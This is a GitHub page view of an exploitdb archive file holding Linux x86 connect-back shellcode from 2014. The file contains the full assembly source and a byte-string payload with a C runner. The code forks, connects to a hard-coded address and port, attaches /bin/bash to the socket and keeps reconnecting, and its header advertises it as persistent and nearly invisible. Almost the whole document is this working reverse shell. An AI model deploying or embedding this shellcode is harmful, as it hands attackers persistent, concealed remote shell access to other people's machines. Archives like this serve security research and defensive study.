forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path34667.c
More file actions
executable file
·121 lines (109 loc) · 3.15 KB
/
34667.c
File metadata and controls
executable file
·121 lines (109 loc) · 3.15 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
/*
#Title: connect back shellcode that splits from the process it was injected into, and then stays persistent and difficult to remove. It is also very close to invisible due to some interesting effects created by forking, and calling the rdtsc instruction
#length: 139 bytes
#Date: 14 September 2014
#Author: Aaron Yool (aka: MadMouse)
#tested On: Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
*/
/*
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
irc.enigmagroup.org
;
; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
irc.enigmagroup.org
;
; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
[bits 32]
section .text
global _start
_start:
; fork(void);
xor eax,eax ; cleanup after rdtsc
xor edx,edx ; ....
xor ebx,ebx ; cleanup the rest
xor ecx,ecx ; ....
mov al,0x02
int 0x80
cmp eax,1 ; if this is a child, or we have failed to clone
jl fork ; jump to the main code
jmp exit
fork:
; socket(AF_INET, SOCK_STREAM, 0);
push eax
push byte 0x1 ; SOCK_STREAM
push byte 0x2 ; AF_INET
mov al, 0x66 ; sys_socketcall
mov bl,0x1 ; sys_socket
mov ecx,esp
int 0x80
; dup2(s,i);
mov ebx,eax ; s
xor ecx,ecx
loop:
mov al,0x3f ; sys_dup2
int 0x80
inc ecx
cmp ecx,4
jne loop
; connect(s, (sockaddr *) &addr,0x10);
push 0x0101017f ; IP = 127.1.1.1
push word 0x391b ; PORT = 6969
push word 0x2 ; AF_INET
mov ecx,esp
push byte 0x10
push ecx ;pointer to arguments
push ebx ; s -> standard out/in
mov ecx,esp
mov al,0x66
int 0x80
xor ecx,ecx
sub eax,ecx
jnz cleanup ; cleanup and start over
; fork(void);
mov al,0x02
int 0x80
cmp eax,1 ; if this is a child, or we have failed to clone
jl client ; jump to the shell
xor eax,eax
push eax
jmp cleanup ; cleanup and start over
client:
; execve(SHELLPATH,{SHELLPATH,0},0);
mov al,0x0b
jmp short sh
load_sh:
pop esi
push edx ; 0
push esi
mov ecx,esp
mov ebx,esi
int 0x80
cleanup:
; close(%ebx)
xor eax,eax
mov al,0x6
int 0x80
pause
rdtsc
pause
jmp _start
exit:
; exit(0);
xor eax,eax
mov al,0x1
xor ebx,ebx
int 0x80
sh:
call load_sh
db "/bin/bash"
*/
const char evil[] =
"\x31\xc0\x31\xd2\x31\xdb\x31\xc9\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x02\xeb\x62\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x04\x75\xf6\x68\x7f\x01\x01\x01\x66\x68\x1b\x39\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x29\xc8\x75\x1b\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x05\x31\xc0\x50\xeb\x0d\xb0\x0b\xeb\x1f\x5e\x52\x56\x89\xe1\x89\xf3\xcd\x80\x31\xc0\xb0\x06\xcd\x80\xf3\x90\x0f\x31\xf3\x90\xeb\x8b\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
typedef void (*shellcode)(void);
void main(void)
{
((shellcode)evil)();
}